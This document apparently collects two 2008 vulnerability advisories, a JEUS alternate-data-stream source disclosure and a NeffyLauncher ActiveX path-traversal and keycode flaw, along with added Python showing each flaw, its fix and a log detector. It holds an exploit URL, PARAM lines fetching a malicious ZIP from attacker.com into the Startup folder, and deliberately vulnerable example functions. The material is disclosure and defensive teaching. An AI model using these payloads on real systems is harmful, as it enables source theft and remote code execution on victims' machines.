TmaxSoft JEUS Alternate Data Streams Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: TmaxSoft JEUS Alternate Data Streams Vulnerability
Author: Simon Ryeo (bar4mi (at) gmail)
Severity: High
Impact: Remote File Disclosure
Vulnerable Version: JEUS 5: Fix#26 on NTFS

References:
- http://www.microsoft.com/technet/security/bulletin/ms98-003.mspx
- http://www.tmaxsoft.com
- http://www.tmax.co.kr/tmaxsoft/index.screen

History:
- 10.22.2008: Initial notification
- 10.23.2008: The vendor responded
- 11.21.2008: The vendor replied with detailed information.
- 12.12.2008: The vendor finished the preparation of patches and responses.

Description:
On NTFS, TmaxSoft JEUS, which is a famous web application server, contained a vulnerability that allows an attacker to obtain web application source files. This was caused by ADSs (Alternate Data Streams; ::$DATA). JEUS couldn't handle ::$DATA, so it treated test.jsp::$DATA as a normal file when it was requested. This is similar to the past MS Windows IIS vulnerability (BID 0149).

Exploit:
The attacker can obtain them easily using a URL request.

    http://www.target.com/foo/bar.jsp::$DATA

Solution:
The vendor released solutions for this problem.

Method 1) Upgrade JEUS
- JEUS 5: http://technet.tmax.co.kr/kr/download/platformList.do?groupCode=WASproduct Code=JeusversionCode=5.0.0.26.Pfc=downsc=down_productmid=binary
- JEUS 4:
  a. Use the WebtoB function change (Method 2)
  b. Upgrade JEUS to version 6 (the service for version 4 will be out of service after Dec 2009)

Method 2) Change the WebtoB function
- Change the message communication method from 'URI' to 'EXT'. (This is valid whether you use the WebtoB embedded in JEUS or the standalone WebtoB.)

Method 3) Install the patch (e.g. jext.jar)
- The patch file will be valid until Jan. 2009. (Target versions: 3.3.7.15, 4.0, 4.1, 4.2 final, 5.x; for each version it will be offered below Fix#26.)

Please refer to the TmaxSoft homepage for detailed support plans. It will be valid until Mar. 2009.
(http://www.tmaxsoft.com)
-----BEGIN PGP SIGNATURE-----
Version: 9.8.3.4028

wj8DBQFJQqOXzuoR/xLtCioRAn2DAKDpN2ckXu7xt6OvYUeWHLiEoPQOmwCg6csI
KY69SPNXHg2rHlXJanIBQDw=
=SW3P
-----END PGP SIGNATURE-----
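The dispatch flaw the advisory describes, modelled as an added example (illustrative code, not JEUS or WebtoB code; the function names, the extension table and the log lines are constructed for it): an extension-keyed handler selection that lets `bar.jsp::$DATA` fall through to static-file serving, beside a hardened version that percent-decodes and rejects any resource name containing a colon, plus a small detector for probes of this kind in access logs, including the percent-encoded spelling.

```python
import os
import re
from urllib.parse import unquote

# Extensions that the (hypothetical) server maps to the JSP engine; anything
# else falls through to a static-file handler that returns the bytes verbatim.
SERVLET_EXTENSIONS = {".jsp"}

# NTFS stream syntax is  name:stream[:$type].  "name::$DATA" selects the
# unnamed default stream, which is the ordinary file content.
NTFS_STREAM = re.compile(r"^[^:]+:[^:]*(?::\$[A-Za-z0-9_]+)?$")


def _last_segment(request_path: str) -> str:
    return request_path.rsplit("/", 1)[-1]


def vulnerable_dispatch(request_path: str) -> str:
    """Model of the flawed behaviour: the handler is chosen from the textual
    extension. '/foo/bar.jsp::$DATA' splits into ('.../bar', '.jsp::$DATA'),
    which is not a registered servlet extension, so the static handler opens
    the path; NTFS resolves it to the default stream of bar.jsp and the JSP
    source is returned as a download."""
    _, ext = os.path.splitext(request_path)
    return "execute-jsp" if ext in SERVLET_EXTENSIONS else "serve-static"


def hardened_dispatch(request_path: str) -> str:
    """Percent-decode once, then refuse any resource name containing ':'.
    A colon is not legal in a Windows file name, so it has no legitimate use
    in a resource name and can be rejected before any handler runs."""
    name = _last_segment(unquote(request_path))
    if ":" in name:
        return "reject"
    _, ext = os.path.splitext(name)
    return "execute-jsp" if ext in SERVLET_EXTENSIONS else "serve-static"


# Constructed access-log lines (CLF-style, not real traffic) for the detector.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Dec/2008:10:01:02 +0900] "GET /foo/bar.jsp HTTP/1.1" 200 512
10.0.0.7 - - [13/Dec/2008:10:01:09 +0900] "GET /foo/bar.jsp::$DATA HTTP/1.1" 200 2048
10.0.0.7 - - [13/Dec/2008:10:01:11 +0900] "GET /foo/bar.jsp%3A%3A%24DATA HTTP/1.1" 200 2048
10.0.0.9 - - [13/Dec/2008:10:02:30 +0900] "GET /img/logo.png HTTP/1.1" 200 900
"""

LOG_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def find_ads_probes(log_text: str) -> list:
    """Return decoded request paths whose final segment names an NTFS stream.
    Decoding first catches the %3A%3A%24DATA spelling that a grep for the
    literal '::$DATA' misses."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_REQUEST.search(line)
        if not m:
            continue
        path = unquote(m.group(1).split("?", 1)[0])
        if NTFS_STREAM.match(_last_segment(path)):
            hits.append(path)
    return hits


if __name__ == "__main__":
    print(vulnerable_dispatch("/foo/bar.jsp::$DATA"))   # serve-static
    print(hardened_dispatch("/foo/bar.jsp::$DATA"))     # reject
    print(find_ads_probes(SAMPLE_LOG))
```

Rejecting on ':' rather than matching only the `::$DATA` suffix also covers named streams (`bar.jsp:anything`), which NTFS accepts just as readily; a blocklist of one spelling is the wrong shape for this check. The detector decodes before matching for the same reason a WAF rule should: the literal string is absent from `%3A%3A%24DATA`.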
Fwd: TmaxSoft JEUS Alternate Data Streams Vulnerability
Dear bugtraq,

Thanks for your concern. I saw BID 32804. It contains one piece of incorrect information: TmaxSoft JEUS 5 Fix#26 is not vulnerable. The vendor advises users to upgrade to this version (Fix#26). Please change this information.

Sincerely,
Simon

---------- Forwarded message ----------
From: Simon Ryeo bar...@gmail.com
Date: 2008/12/13
Subject: TmaxSoft JEUS Alternate Data Streams Vulnerability
To: bugtraq@securityfocus.com
CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: CDNetworks Nefficient Download (NeffyLauncher.dll) Vulnerabilities
Author: Simon Ryeo (bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote Code Execution
Vulnerable Systems: MS Windows Systems
Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}
Solution: Apply the vendor's patch
Vendor's Homepage: http://www.cdnetworks.com

Reference:
How to stop an ActiveX control from running in Internet Explorer
http://support.microsoft.com/kb/240797/ko
http://support.microsoft.com/kb/240797/en-us

History:
- 02.27.2008: Initial notification
- 03.06.2008: The vendor patched
- After: The vendor is applying the patch to their customers.

Description:
Nefficient Download is an ActiveX control used to download and upgrade files such as game installers through HTTP, FTP, etc. It has two vulnerabilities. First, an attacker can copy a malicious file to any path, such as the Startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup). Second, an attacker can issue keycodes, which are used to restrict execution on other domains.

Purpose:
I report this vulnerability not to promote abnormal uses but to make the software more secure. This vulnerability was patched through the vendor's positive effort. I hope this information helps many people who study security and develop applications.

1. Remote Code Execution
First of all, we must have write permission on a board on a web site that uses this ActiveX control, or obtain a valid keycode for our own site. An attacker who has a valid keycode can build an exploit by modifying the HttpSkin and SkinPath values. The malicious files on the attacker's site must be compressed as a ZIP file. For instance, the modification below copies the files to the Windows root directory.

    <PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
    <PARAM NAME="SkinPath" VALUE="../../../../">

In this way an attacker can set SkinPath to the All Users Startup folder. Then his malicious program executes when the user restarts the computer.

2. Generating a KeyCode Value
An attacker can make a keycode generator by debugging this ActiveX control. A keycode's value has two parts. The first two digits represent the domain's length (hexadecimal). The next five (or more) digits are the values used to calculate a domain. The keycode check procedure of this ActiveX control works as follows. It calculates the keycode's value and returns four bytes as a result. Next it starts the domain's calculation and returns four bytes. Finally, it compares these two four-byte values to check whether the site is valid.

I made a PoC using inline assembly and C, but it is not released to the public at the vendor's request. (Just refer to the descriptions above.)
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.7.1 (Build 1503)
Charset: utf-8

wj8DBQFH+eM+zuoR/xLtCioRAhKKAJ4nkA8EGap6fZ+xvRJSNpCDlcanwQCglsYb
p8LCGeXrEnMoshPDBVB4dOc=
=OZDe
-----END PGP SIGNATURE-----
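As an added example for the SkinPath traversal in section 1 (illustrative Python, not the vendor's code; the NeffyLauncher internals are not published, and the directory names, function names and ZIP contents are assumed for the demonstration): an installer that joins the control's skin directory with an attacker-controlled SkinPath and unpacks the downloaded ZIP there, beside a version that confines both the destination and every archive entry to the skin directory. The sandbox stands in for the whole drive, so the escaping write stays inside a temporary directory.

```python
import io
import tempfile
import zipfile
from pathlib import Path


def build_skin_zip(entries: dict) -> bytes:
    """Constructed stand-in for the archive fetched from the HttpSkin URL."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def vulnerable_install(skin_base: Path, skin_path: str, zip_bytes: bytes) -> list:
    """The flawed pattern: join the base directory with SkinPath and extract,
    trusting both the page's parameter and the archive's entry names.
    Returns the resolved paths that were written."""
    dest = skin_base / skin_path          # '../../../../' climbs out of skin_base
    dest.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return [str((dest / n).resolve()) for n in zf.namelist()]


def _confined(root: Path, candidate: Path) -> bool:
    """True when candidate, after collapsing '..' and symlinks, is root or lies
    inside it. Comparing resolved paths is what makes '../' ineffective."""
    root_r = root.resolve()
    cand_r = candidate.resolve()
    return cand_r == root_r or root_r in cand_r.parents


def hardened_install(skin_base: Path, skin_path: str, zip_bytes: bytes) -> list:
    """Confine the destination to skin_base and every entry to the destination.
    Raises ValueError instead of writing anywhere outside the skin directory."""
    dest = skin_base / skin_path
    if not _confined(skin_base, dest):
        raise ValueError(f"SkinPath escapes the skin directory: {skin_path!r}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        # Validate every entry before writing anything ("zip slip" guard).
        for info in zf.infolist():
            name = info.filename.replace("\\", "/")
            if Path(name).is_absolute() or not _confined(dest, dest / name):
                raise ValueError(f"archive entry escapes destination: {info.filename!r}")
        dest.mkdir(parents=True, exist_ok=True)
        written = []
        for info in zf.infolist():
            target = dest / info.filename.replace("\\", "/")
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(str(target.resolve()))
    return written


def demo() -> dict:
    """Run both installers in a throwaway sandbox that models the drive:
    skins live three levels below the sandbox root, so SkinPath '../../../'
    lands at the root (the advisory's Windows root directory)."""
    payload = build_skin_zip({                      # constructed contents
        "skin/theme.ini": b"[skin]\nname=default\n",
        "payload.exe": b"MZ-not-a-real-binary",
    })
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp).resolve()
        base = root / "Program Files" / "Nefficient" / "skins"   # assumed layout
        base.mkdir(parents=True)
        escaped = vulnerable_install(base, "../../../", payload)
        try:
            hardened_install(base, "../../../", payload)
            blocked = False
        except ValueError:
            blocked = True
        inside = hardened_install(base, "current", payload)
        return {
            "vulnerable_wrote_outside_base": any(not _confined(base, Path(p)) for p in escaped),
            "vulnerable_dropped_at_root": (root / "payload.exe").exists(),
            "hardened_blocked_traversal": blocked,
            "hardened_wrote_inside_base": all(_confined(base, Path(p)) for p in inside),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The check is done on resolved paths, not on the presence of `..` in the string, because `SkinPath` could just as well be an absolute path or use a mix of separators; the archive entries get the same treatment because the page's attacker controls the ZIP too. A native control would do the equivalent by canonicalising with the Win32 full-path API and comparing case-insensitively, since NTFS paths are.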